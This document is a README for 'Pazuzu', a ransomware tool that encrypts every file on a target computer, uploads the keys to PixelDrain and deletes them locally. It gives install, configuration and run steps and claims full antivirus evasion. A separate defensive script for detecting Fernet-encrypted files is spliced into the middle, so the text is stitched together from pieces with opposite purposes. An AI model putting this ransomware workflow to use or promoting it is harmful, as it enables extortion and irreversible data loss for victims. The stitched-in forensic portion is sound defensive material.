Brand new crypto-locker built on the Fernet encryption method. An automatic parser goes through all the files on the target computer and uses a new encryption key for each file, making forensic investigation harder, even impossible. At the end of the execution, a CSV file is created, uploaded to PixelDrain and deleted from the computer. The only way to decrypt the files is to have the PixelDrain file ID necessary to run the decrypt.py program. Pazuzu is 100% automatic; the only changes needed for it to run properly are made in the conf.py file.
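For incident responders, the per-file Fernet encryption described above leaves a recognisable artefact: a Fernet token is base64url text whose first byte is the version 0x80, followed by an unencrypted 8-byte creation timestamp. The triage helper below is an added example, not part of this project's code; it assumes each encrypted file holds one bare Fernet token as its whole content (the README does not state the on-disk layout), and `fernet_time`, `triage` and `demo` are hypothetical names.

```python
import base64
import struct
import tempfile
from datetime import datetime, timezone
from pathlib import Path

FIXED = 1 + 8 + 16 + 32  # version byte, timestamp, IV, HMAC-SHA256


def fernet_time(data):
    """UTC creation time if data is shaped like one Fernet token, else None."""
    data = data.strip()
    if not data.startswith(b"gAAAAA"):  # 0x80 then zero high timestamp bytes
        return None
    try:
        raw = base64.b64decode(data, altchars=b"-_", validate=True)
    except ValueError:
        return None
    body = len(raw) - FIXED  # AES-CBC ciphertext: whole 16-byte blocks, at least one
    if raw[0] != 0x80 or body < 16 or body % 16:
        return None
    # Structural match only (no key, so no HMAC check); the timestamp is unencrypted.
    return datetime.fromtimestamp(struct.unpack(">Q", raw[1:9])[0], tz=timezone.utc)


def triage(root):
    """(path, token time) per file whose whole content is a Fernet token (assumed layout)."""
    hits = []
    for path in Path(root).rglob("*"):
        try:
            stamp = fernet_time(path.read_bytes()) if path.is_file() else None
        except OSError:
            continue  # unreadable entry: skip it and keep scanning
        if stamp:
            hits.append((str(path), stamp))
    return sorted(hits, key=lambda hit: hit[1])


def demo():
    """Constructed sample: one token-shaped file (zero filler, no real key) and one text file."""
    raw = b"\x80" + struct.pack(">Q", 1700000000) + bytes(16 + 32 + 32)
    with tempfile.TemporaryDirectory() as root:
        Path(root, "report.docx").write_bytes(base64.urlsafe_b64encode(raw))
        Path(root, "notes.txt").write_bytes(b"gAAAAA is only a prefix, not a token")
        return [(Path(p).name, t.isoformat()) for p, t in triage(root)]


if __name__ == "__main__":
    print(demo())
```

Sorting the hits by token time gives a per-file encryption timeline that can be compared with filesystem and network logs.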
I made this software, and I'm not responsible for what you do with it or any problems it causes. By using it, you agree to this rule.
- 100% Automatic & 100% Undetectable
- Irreversible Encryption Method
- Error Handled for Persistent Execution
- Comprehensive & Easy Usage
Before running Pazuzu, make sure you install the following libraries:
- requests
- cryptography
You can install them by typing the following command in your terminal:
pip3 install -r requirements.txt
Clone this repository to your local machine.
Open your terminal and navigate to the cloned repository.
Edit the config.py file: to encrypt, you must change the start_dir and tmp_csv values; to decrypt, you must change the pxfile_id value.
To encrypt, run the script by typing python3 pazuzu.py in your terminal. To decrypt, type python3 decrypt.py in your terminal.
Pazuzu Locker can easily bypass all known antivirus, making it easier to deploy.
Default usage of Pazuzu Locker, from encryption to decryption on a sample directory; conf.py used for the demo:
param = {
'start_dir': '/home/pazuzu/sample',
'tmp_csv': 'tmp.csv',
'pxfile_id': 'FPJZjoAd'
}